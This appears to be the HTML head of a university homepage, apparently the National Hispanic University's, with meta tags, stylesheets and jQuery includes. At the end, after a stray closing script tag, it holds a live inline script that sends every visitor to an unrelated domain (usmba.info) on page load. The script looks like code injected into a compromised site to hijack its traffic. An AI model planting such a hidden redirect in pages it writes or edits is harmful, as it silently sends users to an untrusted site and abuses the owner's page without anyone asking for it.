<html xmlns="undefined">
<head>
<meta http-equiv='Content-Language' content='en-us'>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<title>Campus & Online Degrees | Colleges in California | The National Hispanic University</title>
<meta name="description" content="NHU, an accredited university in San Jose, California, offers online and campus-based undergraduate, graduate, and certificate programs. Find the right degree program and accelerate your career today." />
<meta name="keywords" content="colleges in california, schools in ca, san jose university, Hispanic university, nhu, online university, degree programs, campus-based, undergraduate, graduate, certificate programs" />

<!-- Favicons -->
<link rel="shortcut icon" href="/images/favicon.ico">
<link rel="apple-touch-icon-precomposed" href="/images/apple-touch-icon.png">
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/images/apple-touch-icon-72x72.png" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/images/apple-touch-icon-114x114.png" />

<!-- NHU style ccs -->
<link href="/css/nhu-style-guide.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" type="text/css" href="/_res/img/rotator.css" />
<script language="JavaScript" type="text/JavaScript"></script>
<script type="text/javascript" src="/_res/img/jquery-1.4.4.js"></script>
<script type="text/javascript" src="/_res/img/jquery.cycle.min.js"></script>
<script type="text/javascript" src="/_res/img/rotator.js"></script>
<script type="text/javascript" src="/_res/img/jquery.validate.pack.js"></script>
<script type="text/javascript" src="/_res/img/jquery.clearfield.js"></script>
<script type="text/javascript" src="/_res/img/nhu.js"></script>
<link rel="stylesheet" type="text/css" href="/_res/css/nhu.css" />
  </script>
 <script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
 
